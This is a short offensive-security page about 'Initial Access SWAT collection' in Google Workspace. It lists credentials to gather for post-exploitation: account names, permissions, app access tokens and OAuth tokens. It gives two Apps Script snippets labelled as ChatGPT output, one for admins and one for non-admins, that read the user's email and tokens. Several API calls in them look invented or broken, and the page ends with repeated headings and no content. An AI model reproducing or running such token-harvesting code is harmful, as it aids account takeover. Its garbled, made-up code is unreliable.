Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.
Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled
Collect:
- Account name
- Email address
- Account permissions
- App access tokens
- Oauth Tokens
ChatGPT Example Script:
Google Workspace Admin
function getAccountInfo() {
var email = Session.getActiveUser().getEmail();
var account = AdminDirectory.Users.get(email);
var accountName = account.name.fullName;
var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility;
var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
Logger.log("Account Name: " + accountName);
Logger.log("Email Address: " + email);
Logger.log("Account Permissions: " + accountPermissions);
Logger.log("App Access Tokens: " + appAccessTokens);
Logger.log("OAuth Tokens: " + oAuthTokens);
}
Google Workspace Non-Admin
function getUserInfo() {
var user = Session.getActiveUser();
var email = user.getEmail();
var name = user.getUsername();
var accessToken = ScriptApp.getOAuthToken();
var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken();
var userInfo = {
'name': name,
'email': email,
'accessToken': accessToken,
'appAccessToken': appAccessToken
};
Logger.log(userInfo);
}
Google App Scripts
Initial Access SWAT collection script
Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.
ChatGPT Example Script:
Google Workspace Admin
Google Workspace Non-Admin